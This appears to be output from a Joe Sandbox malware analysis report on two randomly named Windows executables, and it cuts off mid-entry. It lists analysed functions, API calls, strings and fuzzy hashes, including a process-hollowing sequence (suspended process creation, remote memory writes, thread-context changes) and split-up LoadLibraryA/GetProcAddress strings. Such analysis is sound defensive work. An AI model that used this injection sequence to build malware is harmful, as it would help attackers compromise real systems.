Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89ad0e022ef5cab7a032d573df8f508e9626840d16f026a53905bfa3a662b1c
Instruction ID: 3d60e0741474f03a577e8791bb4f9a0a4169bd656513ee3a96fdf881d9a9356f
Opcode Fuzzy Hash: c89ad0e022ef5cab7a032d573df8f508e9626840d16f026a53905bfa3a662b1c
Instruction Fuzzy Hash: 8C51ABB1E002099FCB18DF98D881BEEBBB5FB99710F14416DE419B7351D770AA44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00212E10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00212E47
___except_validate_context_record.LIBVCRUNTIME ref: 00212E4F
_ValidateLocalCookies.LIBCMT ref: 00212ED8
__IsNonwritableInCurrentImage.LIBCMT ref: 00212F03
_ValidateLocalCookies.LIBCMT ref: 00212F58

Strings

i&, xrefs: 00212F78
csm, xrefs: 00212EED

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: i&$csm
API String ID: 1170836740-3583052009
Opcode ID: d911c4e9cf4c2eab7d0b5121c86b32318879226eadfc7c72b316fa3aa1019949
Instruction ID: 7f0d160eddc657807d555fb2c4130da08c0cff65e6a9c9554e2eb7bae3c02c9b
Opcode Fuzzy Hash: d911c4e9cf4c2eab7d0b5121c86b32318879226eadfc7c72b316fa3aa1019949
Instruction Fuzzy Hash: B3419230A20209DBCF10DF68D885ADEBBF5EF55324F148055F9149B292D732EAB9CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00227900 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00227986

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 9c6486d1a0c3cec0792a5cef27cf9beec5864b5b67f60389e8f97ee3734ed929
Instruction ID: b7d2fbf8c39ef5c6b6d73cfdafe43cde2ff1e336939786ced44996ec4ae424dd
Opcode Fuzzy Hash: 9c6486d1a0c3cec0792a5cef27cf9beec5864b5b67f60389e8f97ee3734ed929
Instruction Fuzzy Hash: 0DB16C7292C376BFDB11CFA4EC81BAE7BA5EF15310F144155E504AF282D2749961CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001AE440 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 001AE491

Strings

type must be string, but is , xrefs: 001AE4F8
type must be object, but is , xrefs: 001AE7C9
type must be boolean, but is , xrefs: 001AE582

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be object, but is $type must be string, but is
API String ID: 118556049-3306752645
Opcode ID: 14de8978cb4fba397c242b3033da6db9c922a5cb16d4d1e07f97cc18969bd5e3
Instruction ID: 5a67aab8930f5ecb099d89ffa9569fff73ebc5db088080d49294e6e051ca571a
Opcode Fuzzy Hash: 14de8978cb4fba397c242b3033da6db9c922a5cb16d4d1e07f97cc18969bd5e3
Instruction Fuzzy Hash: 11D115B5D002489FDB14DFA8D841BAEBBF8EF19310F148169E409E7781EB35AE44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001373B0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 001375BE
___std_exception_destroy.LIBVCRUNTIME ref: 001375CD

Strings

at line , xrefs: 001373F7
, column , xrefs: 00137434, 0013744A

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 61317a62822d0a6b10f0d48522f0a1b0faea6f767f553da28c6150c9c901bf5f
Instruction ID: e713cffd93a8342dc265857860f14b9b779d03d1872c0bdf27575f4e9eea48ee
Opcode Fuzzy Hash: 61317a62822d0a6b10f0d48522f0a1b0faea6f767f553da28c6150c9c901bf5f
Instruction Fuzzy Hash: 2061E1B0A002049FDB1CDF68DC94BADBBB6FF45300F244628E415A7BC2D774AA948B91

Uniqueness

Uniqueness Score: -1.00%

Function 00136C60 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00136F11
___std_exception_destroy.LIBVCRUNTIME ref: 00136F20

Strings

[json.exception., xrefs: 00136CB8

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 3ff675610bcaa18b334bf1cf6723aa1a1f5ddc2a5f40612cff0af0e54e84574e
Instruction ID: 39e1b33da134756bc4e5c3fb801c1326f2bee5662c519cc35e6b94a182fde5f8
Opcode Fuzzy Hash: 3ff675610bcaa18b334bf1cf6723aa1a1f5ddc2a5f40612cff0af0e54e84574e
Instruction Fuzzy Hash: 4391D470A002049FDB18CF68D994BAEBBF6FF45300F20866CE459AB792D775A985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0022F2A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00226DB3: GetLastError.KERNEL32(?,?,00000000,?,6DB1941B,0021D7EE,?,?,9E4B9375,001C447D,?,?,?,?,67377882,002AA5FF), ref: 00226DD4

___free_lconv_mon.LIBCMT ref: 0022F2EB

Strings

x3&, xrefs: 0022F393
81&, xrefs: 0022F2BD

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: ErrorLast___free_lconv_mon
String ID: 81&$x3&
API String ID: 509460907-3566459819
Opcode ID: cb05b1a5a6f1d8eccc8baa0d64ae6ad37f30449a557ea7d05f550b2b9d569044
Instruction ID: cb4ab7b63b4e0a076dcab537417e66030c12fce7edc4715b29ee858e56f863f4
Opcode Fuzzy Hash: cb05b1a5a6f1d8eccc8baa0d64ae6ad37f30449a557ea7d05f550b2b9d569044
Instruction Fuzzy Hash: 86315E32620366FFEB60AFB8FA45B9A73F8AB01310F114479E454D6151DF70AD609B50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cTThtD77H613MBNsXAevJo07.exePID: 7616, Parent PID: 6984COMMON

Execution Graph

Execution Coverage:	18.5%
Dynamic/Decrypted Code Coverage:	90.8%
Signature Coverage:	9.2%
Total number of Nodes:	76
Total number of Limit Nodes:	5

Executed Functions

Function 0268B4F9 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0268B668
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0268B67B
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0268B699
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0268B6E8
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 0268B740
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0268B78B
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0268B7C9
Wow64SetThreadContext.KERNEL32(?,?), ref: 0268B805
ResumeThread.KERNELBASE(?), ref: 0268B814

Strings

GetP, xrefs: 0268B57B
ress, xrefs: 0268B583
Load, xrefs: 0268B537
aryA, xrefs: 0268B53F

Memory Dump Source

Source File: 00000006.00000002.2164672065.000000000268B000.00000040.00000800.00020000.00000000.sdmp, Offset: 0268B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_268b000_cTThtD77H613MBNsXAevJo07.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResume
String ID: GetP$Load$aryA$ress
API String ID: 531899398-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 38f8a5c2eda85fc5b4f32613130dd5185bf9740e22ef178ee955077ee0ab8410
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 2DB1D37664028AAFDB60CF68CC80BDA77A5FF88714F158524EA08EB341D774FA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAFF0 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 00CBB08C

Memory Dump Source

Source File: 00000006.00000002.2158530376.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_cTThtD77H613MBNsXAevJo07.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2f6474545d8f083ab4280834f568243663c447c125e2877bea438711008355ba
Instruction ID: 298b35dc183d2ee7a35f02b3233bcec9ac13fac42152057638008466aeb72a7b
Opcode Fuzzy Hash: 2f6474545d8f083ab4280834f568243663c447c125e2877bea438711008355ba
Instruction Fuzzy Hash: A62115B19003499FCB10DFAAD984ADEBBF5FF48314F10842AE929A7210C7759A54CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAA10 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00CBAA90

Memory Dump Source

Source File: 00000006.00000002.2158530376.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_cTThtD77H613MBNsXAevJo07.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9da91db22e834794d1e23a20144509cd23603e2ac82108f240d63c9820b4a770
Instruction ID: 9259d2c14f4cc4d29be099e6bce478847f5801d1ed135de88216a5a8809cc51d
Opcode Fuzzy Hash: 9da91db22e834794d1e23a20144509cd23603e2ac82108f240d63c9820b4a770
Instruction Fuzzy Hash: 502128B19002599FCB10DFAAC940BDEFBF5FF48310F10842AE558A7250D7749944DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CB8B68 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00CB8BDC

Memory Dump Source

Source File: 00000006.00000002.2158530376.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_cTThtD77H613MBNsXAevJo07.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3f4728df8d5053a0d6aed3a05217a0a238806a21738be52a85fd9c12823c8f02
Instruction ID: 870ca47b2ef25183b93c9dc733fe900ab5ebeadcc8eb924ffda459656784be2f
Opcode Fuzzy Hash: 3f4728df8d5053a0d6aed3a05217a0a238806a21738be52a85fd9c12823c8f02
Instruction Fuzzy Hash: BF1106B1D002499FCB10DFAAC844ADEFBF4FF88320F10842AD469A7250CB75A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAF10 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 00CBAF75

Memory Dump Source

Source File: 00000006.00000002.2158530376.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_cTThtD77H613MBNsXAevJo07.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c5348886dacffe9b449a60e6e1c5e6a273b3321db8b342408090d9fe48fe0fbc
Instruction ID: 5c7683a50e9381248c00352b849d04f6719568b30bf1420e72de05da6a71db6d
Opcode Fuzzy Hash: c5348886dacffe9b449a60e6e1c5e6a273b3321db8b342408090d9fe48fe0fbc
Instruction Fuzzy Hash: 10113DB19002488FCB10DFAAC4457EEFFF5EF88324F108429D455A7250CB75A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CB9608 Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00CB9673

Memory Dump Source

Source File: 00000006.00000002.2158530376.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_cb0000_cTThtD77H613MBNsXAevJo07.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8d004583090d19b664b023c5addb91d616ece30c5ee1914d2fc56df15baa8319
Instruction ID: 9442d09772e1840027ca4b3c9110092234c82167bd2dcad50a839021c0c17484
Opcode Fuzzy Hash: 8d004583090d19b664b023c5addb91d616ece30c5ee1914d2fc56df15baa8319
Instruction Fuzzy Hash: 951149B19002489FCB10DFAAC844BDEFFF5EF88324F10841AE569A7250C775A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D01C Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2145726077.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8d000_cTThtD77H613MBNsXAevJo07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc64e27553e45d6d29619b7e4532331d90968a288d82bd65d1732b1c17b0e1ea
Instruction ID: bfd0cc5e62cf696138ed674e35bed7c3435597911e26a298b3ac5a4d7ba65fae
Opcode Fuzzy Hash: cc64e27553e45d6d29619b7e4532331d90968a288d82bd65d1732b1c17b0e1ea
Instruction Fuzzy Hash: 6621F271504244DFCB15FF14DAC4B26BFB5FB84324F24C569E90A4B296C336D84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D006 Relevance: .1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2145726077.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8d000_cTThtD77H613MBNsXAevJo07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbcb5de3ecaa6784018ace954103d7dcc26225c8f1d274b81d90988c77326fac
Instruction ID: 3a6c8660b7ba15c254453df7d291a46e1c67fe20130eff3c9e04fc004b709861
Opcode Fuzzy Hash: bbcb5de3ecaa6784018ace954103d7dcc26225c8f1d274b81d90988c77326fac
Instruction Fuzzy Hash: 662192714083809FCB02DF14D994B16BF71FB96314F2985DAD8458F297C33AD81ACBA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tskTMObYcvz1CtypLgyOWpYi.exePID: 7624, Parent PID: 6984COMMON

Execution Graph

Execution Coverage:	23.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	57
Total number of Limit Nodes:	1

Executed Functions

Function 027CB4F9 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 027CB668
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027CB67B
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 027CB699
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 027CB6E8
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 027CB740
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 027CB78B
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027CB7C9
Wow64SetThreadContext.KERNEL32(?,?), ref: 027CB805
ResumeThread.KERNELBASE(?), ref: 027CB814

Strings

Load, xrefs: 027CB537
GetP, xrefs: 027CB57B
aryA, xrefs: 027CB53F
ress, xrefs: 027CB583

Memory Dump Source

Source File: 00000007.00000002.2173406468.00000000027CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 027CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27cb000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResume
String ID: GetP$Load$aryA$ress
API String ID: 531899398-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 2ff79bc583b07d66d2e99e31b54abe55bea4b4968f737f7bfb404ff24f4466da
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 53B1E67664024AAFDB60CF68CC80BDA77A5FF88714F158528EA0CAB341D774FA51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0261AC10 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 0261ACAC

Memory Dump Source

Source File: 00000007.00000002.2163745935.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2610000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 212e64780e43fd685e0e74fd81891fe00fc8763f6a48ad76bde7fc67da3377c9
Instruction ID: ce414ddb8e1469910b9af59e5bc932c34afd2a2c49e209cde98b73637c3d317d
Opcode Fuzzy Hash: 212e64780e43fd685e0e74fd81891fe00fc8763f6a48ad76bde7fc67da3377c9
Instruction Fuzzy Hash: EC2104B1901349DFCB10DFA9D984ADEBBF5FF48314F108429E919A7310C775A954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0261A630 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0261A6B0

Memory Dump Source

Source File: 00000007.00000002.2163745935.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2610000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e01b65e627a61d5b96c4fd2d77abdc31f9dec53a56f453306ae4885b4577851d
Instruction ID: 40b5be55128430fef7b0b9748d35fff5dd5ffe202ea02a40eb3fc23fdee90820
Opcode Fuzzy Hash: e01b65e627a61d5b96c4fd2d77abdc31f9dec53a56f453306ae4885b4577851d
Instruction Fuzzy Hash: 8F2139B1D002599FCB10DFAAC944ADEFBF5FF48310F108429E559A7250C734A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02618788 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 026187FC

Memory Dump Source

Source File: 00000007.00000002.2163745935.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2610000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 246485be89f3c4312f14cd0ea640ffa4ab6274a931316df22864c0bbe7ad2350
Instruction ID: 42aed6786fc801585498efcbf9a77b659e069ce834016a5ad6ba830b66525668
Opcode Fuzzy Hash: 246485be89f3c4312f14cd0ea640ffa4ab6274a931316df22864c0bbe7ad2350
Instruction Fuzzy Hash: 541106B1D002499FDB10DFAAC544ADEFBF4FF48324F14842AD459A7250C775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0261AB30 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 0261AB95

Memory Dump Source

Source File: 00000007.00000002.2163745935.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2610000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 505860d5fe503e252afd55ceb1cb9647993459b87ab52032bb29f59b860b0600
Instruction ID: aded908135ec22553121b5e1c54a4699142f0e9a447c4a07482883e0f40f392c
Opcode Fuzzy Hash: 505860d5fe503e252afd55ceb1cb9647993459b87ab52032bb29f59b860b0600
Instruction Fuzzy Hash: B91128B19002488FCB20DFAAC545BDEFFF5EB88324F248829D559A7250CB75A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02619D88 Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 02619DE7

Memory Dump Source

Source File: 00000007.00000002.2163745935.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2610000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: fc95f7433907bcda6d12874c6faf78bc6a14b6228426cc782562942d49e98dff
Instruction ID: a183c1eedb5409e2a1af1b4fc1bf4e538c324d24500942072d64908a8552fc5b
Opcode Fuzzy Hash: fc95f7433907bcda6d12874c6faf78bc6a14b6228426cc782562942d49e98dff
Instruction Fuzzy Hash: A51112B1D006498FCB20DFAAC5857DEBFF4EB48324F208429C45967250CB396584CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02619228 Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02619293

Memory Dump Source

Source File: 00000007.00000002.2163745935.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

